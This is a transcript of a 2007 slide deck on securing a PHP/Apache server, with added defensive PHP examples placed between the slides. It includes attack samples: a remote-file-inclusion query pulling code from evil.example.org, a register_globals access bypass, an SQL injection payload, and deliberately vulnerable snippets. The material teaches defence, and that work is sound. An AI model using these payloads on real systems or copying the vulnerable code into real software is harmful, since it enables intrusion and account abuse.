
Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache

Learn how to set up a secure personal web server using PHP and Apache on a Windows platform. This tutorial covers installation, hardening, and security measures to protect against common vulnerabilities.



Presentation Transcript


  1. Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache Created By: John Gibbons November 27th, 2007

  2. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  3. Overview • PHP • Terminology • Vulnerabilities • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  4. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  5. Overview • Installing a Personal Web Server • XAMPP • Installation • Hardening Security • Updates

  6. Overview • Review • Conclusion • Sources • Questions

  7. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  8. Background • Apache and PHP are free, open source web development tools. • Apache • In development since 1995 • Software that allows a computer to act as a web server • PHP • Server side HTML embedded scripting language • Allows for the creation of dynamic web pages

  9. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  10. NMAP • Open source tool commonly used by hackers • Host Discovery • Identifying computers on a network • Port Scanning • Enumerating the open ports on one or more target computers

  11. NMAP • Version Detection • Interrogating network services listening on remote computers to determine the application name and version number • OS Detection • Remotely determining the operating system and some hardware characteristics of network devices

  12. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  13. Intellitamper • Upon discovering desired (vulnerable) ports/services, directories can be mapped • Attackers can view directories they were not meant to see

  14. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  15. Whois

  16. Whois

  17. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  18. PHP Terminology • Public Scripts: Scripts available via a URL • White list: Assuming input to be invalid until proven valid • Data Filtering: Examining data from an external source to ensure it meets the criteria to be considered valid

  19. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  20. PHP Security • Data Filtering • Initialize all variables • Filter all data that comes from an external source • Develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development • Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice • Consider all data invalid until it is proven valid

  21. PHP Security • Data Filtering Guidelines • Ensure that data filtering cannot be bypassed • Ensure that invalid data cannot be mistaken for valid data • Identify the origin of the data

  22. PHP Security • Register Globals • Disabled by default (version 4.2.0 and greater) • When disabled, data submitted by the client is no longer registered as regular global variables, so client input cannot overwrite them

  23. PHP Security • Register Globals Example
      if (authenticated_user()) {
          $authorized = true;
      }
      if ($authorized) {
          include '/highly/sensitive/data.php';
      }
      • With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control, because $authorized is never initialized to false

  24. PHP Security • Register Globals Example:
      include "$path/script.php";
      • This page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string, which makes the include equivalent to:
      include 'http://evil.example.org/?/script.php';
      • If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file

  25. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  26. PHP Data Filtering • The following validates an email address:
      <?php
      $clean = array();
      $email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
      if (preg_match($email_pattern, $_POST['email'])) {
          $clean['email'] = $_POST['email'];
      }
      ?>

  27. PHP Data Filtering • The following example ensures that $_POST['num'] is an integer:
      <?php
      $clean = array();
      if ($_POST['num'] == strval(intval($_POST['num']))) {
          $clean['num'] = $_POST['num'];
      }
      ?>

  28. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  29. PHP Naming Conventions • Take a white list approach • Use variable names that are easy to identify as valid • $clean from previous example • Never leave variables in the $_GET and $_POST arrays because they are not easily identifiable as valid
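As an added example (not from the slides), the email and integer filters from slides 26 and 27 and the $clean convention from slide 29 combined into one function that also handles missing and non-string fields; the field names, the username pattern and its length limit are assumptions:

```php
<?php
// Added example (not from the slides): white-list filtering of a registration
// form into a $clean array, following slides 26, 27 and 29. Field names and
// the username rule are assumptions made for this example.
declare(strict_types=1);

function filter_registration(array $input): array
{
    $clean = [];                           // only proven-valid data ever lands here

    // Email: the slide's pattern, applied only when the field is present and is
    // a string (a missing field or an array must not slip through).
    $emailPattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
    if (isset($input['email']) && is_string($input['email'])
        && preg_match($emailPattern, $input['email']) === 1) {
        $clean['email'] = $input['email'];
    }

    // Integer: the slide's round-trip test, made strict so "12abc", "007" and
    // arrays are all rejected, then stored as an int rather than a string.
    if (isset($input['num']) && is_string($input['num'])
        && $input['num'] === strval(intval($input['num']))) {
        $clean['num'] = (int) $input['num'];
    }

    // Username: a white list of allowed characters and a length limit (assumed).
    if (isset($input['username']) && is_string($input['username'])
        && preg_match('/^[a-z0-9_]{3,20}$/', $input['username']) === 1) {
        $clean['username'] = $input['username'];
    }

    return $clean;
}

// Constructed sample input standing in for $_POST.
$samples = [
    ['email' => 'alice@example.org', 'num' => '42', 'username' => 'alice_01'],
    ['email' => 'bad<script>@example.org', 'num' => '12abc', 'username' => "bad_guy', 'x"],
    ['num' => ['1'], 'username' => 'ok'],  // array where a string is expected, name too short
];
foreach ($samples as $i => $post) {
    echo "sample $i: ", json_encode(filter_registration($post)), "\n";
}
```

Anything not present in the returned array was never proven valid, so later code reads only from $clean and never from $_POST directly.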

  30. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  31. PHP Timing • Once a PHP script begins to run, the HTTP request has been received • The user no longer has the opportunity to send data • This makes data initialization a very good practice

  32. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  33. PHP Error Reporting • error_reporting • Sets the level of error reporting • Set to E_ALL for both development and production • error_reporting(E_ALL); • display_errors • Displays errors on screen • Use during development • Disable during production • Displayed errors could be useful to potential attackers

  34. PHP Error Reporting • log_errors • Should be turned on during production • Will only induce a performance hit if there is a large number of errors • error_log • Dictates the location of the error log • The web server should have write privileges for this file

  35. PHP Error Reporting • NEW • As of PHP 5.0, there is E_STRICT • Not included within E_ALL • Useful during development • Warns about using deprecated functions
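An added example, not the deck's own code, that applies the settings from slides 33 and 34 from a single bootstrap and then audits the live configuration, so a production deployment that still displays errors on screen or cannot write its log is caught at startup; the log path is an assumption:

```php
<?php
// Added example (not from the slides): apply the error-reporting settings from
// slides 33 and 34, then audit them. The log location is an assumption.
declare(strict_types=1);

function configure_error_reporting(bool $production, string $logFile): void
{
    error_reporting(E_ALL);                               // development and production alike
    ini_set('display_errors', $production ? '0' : '1');   // on screen only while developing
    ini_set('log_errors', '1');                           // always on in production
    ini_set('error_log', $logFile);                       // must be writable by the server user
}

// Returns a list of problems with the live configuration; an empty list means it is sound.
function audit_error_reporting(bool $production): array
{
    $findings = [];
    if ((error_reporting() & E_ALL) !== E_ALL) {
        $findings[] = 'error_reporting does not include E_ALL';
    }
    if ($production && filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'display_errors is enabled in production (shows paths and queries to visitors)';
    }
    if ($production && !filter_var(ini_get('log_errors'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'log_errors is disabled in production';
    }
    $log = ini_get('error_log');
    if ($log === '' || $log === false) {
        $findings[] = 'error_log is unset: errors go to the SAPI default log';
    } elseif (!(is_file($log) ? is_writable($log) : is_writable(dirname($log)))) {
        $findings[] = "error_log '$log' is not writable by this process";
    }
    return $findings;
}

// Constructed run: apply production settings, then audit them.
configure_error_reporting(true, sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'php_errors.log');
$findings = audit_error_reporting(true);
echo $findings === [] ? "error reporting configuration OK\n" : implode("\n", $findings) . "\n";
```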

  36. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  37. SQL: Exposed Access Credentials • Many PHP applications interact with a database • Credentials, used for authentication, are sometimes stored in a plain text file:
      <?php
      $host = 'example.org';
      $username = 'myuser';
      $password = 'mypass';
      $db = mysql_connect($host, $username, $password);
      ?>

  38. SQL: Exposed Access Credentials • The previous example would be stored in a file called “db.inc”. • This file is included whenever database access is needed. • This approach offers convenience by storing all credentials in a single file.

  39. SQL: Exposed Access Credentials • Potential problems arise when a document containing credentials is stored somewhere within the document root. • Every document within the document root has a URL associated with it. • Even if the document is never publicly linked, if it is stored in an inappropriate place it will still be accessible to an attacker.

  40. SQL: Exposed Access Credentials • A simple solution is to place these files, and all modules, outside of the document root. • Both include and require can accept file system paths

  41. SQL: Exposed Access Credentials • Another solution is to place the following in the “httpd.conf” file (this file is only used with Apache):
      <Files ~ "\.inc$">
          Order allow,deny
          Deny from all
      </Files>
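An added example (not from the slides) of the slide 40 approach: the credentials file is loaded only if its resolved path lies outside the document root, so a file that is moved back into the web root fails loudly instead of being served as a URL; it is exercised against a constructed temp directory. Directory names are assumptions, and the included file returns an array rather than setting the slide's global variables.

```php
<?php
// Added example (not from the slides): include "db.inc" only from outside the
// document root (slide 40). Paths are constructed in a temp dir for the demo.
declare(strict_types=1);

function is_outside_docroot(string $file, string $docroot): bool
{
    $real = realpath($file);
    $root = realpath($docroot);
    if ($real === false || $root === false) {
        return false;                       // unknown paths fail closed
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) !== 0;
}

function load_credentials(string $file, string $docroot): array
{
    if (!is_outside_docroot($file, $docroot)) {
        throw new RuntimeException("refusing to load $file: it is inside document root $docroot");
    }
    $creds = require $file;                 // the file returns an array (departure from the slide)
    if (!isset($creds['host'], $creds['username'], $creds['password'])) {
        throw new RuntimeException("$file does not define host, username and password");
    }
    return $creds;
}

// Constructed layout: <tmp>/htdocs is the document root, <tmp>/private sits beside it.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'srv_' . bin2hex(random_bytes(4));
mkdir("$base/htdocs", 0700, true);
mkdir("$base/private", 0700, true);
$inc = "<?php return ['host' => 'localhost', 'username' => 'myuser', 'password' => 'mypass'];";
file_put_contents("$base/private/db.inc", $inc);   // correct placement
file_put_contents("$base/htdocs/db.inc", $inc);    // the mistake described on slide 39

foreach (["$base/private/db.inc", "$base/htdocs/db.inc"] as $candidate) {
    try {
        $creds = load_credentials($candidate, "$base/htdocs");
        echo "loaded credentials for {$creds['username']} from $candidate\n";
    } catch (RuntimeException $e) {
        echo "blocked: {$e->getMessage()}\n";
    }
}
array_map('unlink', ["$base/private/db.inc", "$base/htdocs/db.inc"]);
array_map('rmdir', ["$base/private", "$base/htdocs", $base]);
```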

  42. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  43. SQL Injection • Results from data not being filtered. • Example:
      <?php
      $sql = "INSERT INTO users (reg_username, reg_password, reg_email)
              VALUES ('{$_POST['reg_username']}', '$reg_password', '{$_POST['reg_email']}')";
      ?>

  44. SQL Injection • This simple example allows the user to input a user name, password, and email address in order to create an account. • However, without data filtering, an attacker could enter the following into the user name field:
      bad_guy', 'mypass', ''), ('good_guy

  45. SQL Injection • Assume the attacker gives a valid email address and the application generates the password “1234” • The SQL statement becomes:
      $sql = "INSERT INTO users (reg_username, reg_password, reg_email)
              VALUES ('bad_guy', 'mypass', ''), ('good_guy', '1234', 'shiflett@php.net')";

  46. SQL Injection • The attacker has successfully created two accounts, and was able to supply all the information for the “bad guy” account. • The automatically generated password was bypassed

  47. SQL Injection: Protection • Filter your data • Escape your data • Valid input may interfere with SQL formatting. • Use functions native to your database to handle escaping any characters that may interfere. • e.g. mysql_escape_string()
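An added example (not from the slides) that runs the slide 43 INSERT against an in-memory SQLite database with the slide 44 user-name payload, once built by string interpolation and once as a prepared statement, which is a swap-in for the escaping advice above; it requires the pdo_sqlite extension. The interpolated form stores two rows, the prepared form stores one row whose user name is the payload itself, taken literally.

```php
<?php
// Added example (not from the slides): the slide's INSERT, vulnerable and
// hardened, against in-memory SQLite. Table and columns follow the slide;
// "1234" is the slide's generated password. Requires pdo_sqlite.
declare(strict_types=1);

function fresh_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (reg_username TEXT, reg_password TEXT, reg_email TEXT)');
    return $db;
}

// Vulnerable: untrusted $post values are spliced into the SQL text (slide 43).
function register_interpolated(PDO $db, array $post, string $reg_password): int
{
    $sql = "INSERT INTO users (reg_username, reg_password, reg_email)
            VALUES ('{$post['reg_username']}', '$reg_password', '{$post['reg_email']}')";
    $db->exec($sql);
    return (int) $db->query('SELECT COUNT(*) FROM users')->fetchColumn();
}

// Hardened: the same INSERT with placeholders; values never touch the SQL text.
function register_prepared(PDO $db, array $post, string $reg_password): int
{
    $stmt = $db->prepare('INSERT INTO users (reg_username, reg_password, reg_email)
                          VALUES (:u, :p, :e)');
    $stmt->execute([':u' => $post['reg_username'], ':p' => $reg_password, ':e' => $post['reg_email']]);
    return (int) $db->query('SELECT COUNT(*) FROM users')->fetchColumn();
}

// Constructed request: the user-name payload from slide 44 plus a valid email.
$post = ['reg_username' => "bad_guy', 'mypass', ''), ('good_guy",
         'reg_email'    => 'shiflett@php.net'];

$rows = register_interpolated(fresh_db(), $post, '1234');
echo "interpolated: $rows row(s) inserted\n";

$db = fresh_db();
$rows = register_prepared($db, $post, '1234');
$name = $db->query('SELECT reg_username FROM users')->fetchColumn();
echo "prepared: $rows row(s) inserted; stored user name is ", var_export($name, true), "\n";
```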

  48. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  49. Cross Site Scripting (XSS) • Exploits the trust a user has for a particular site. • Users don't necessarily have a high level of trust for any web site, but the browser does. For example, when the browser sends cookies in a request, it is trusting the web site. Users may also have different browsing habits or even different levels of security defined in their browser depending on which site they are visiting.

  50. Cross Site Scripting (XSS) • Generally involves web sites that display external data. • Applications at a heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).
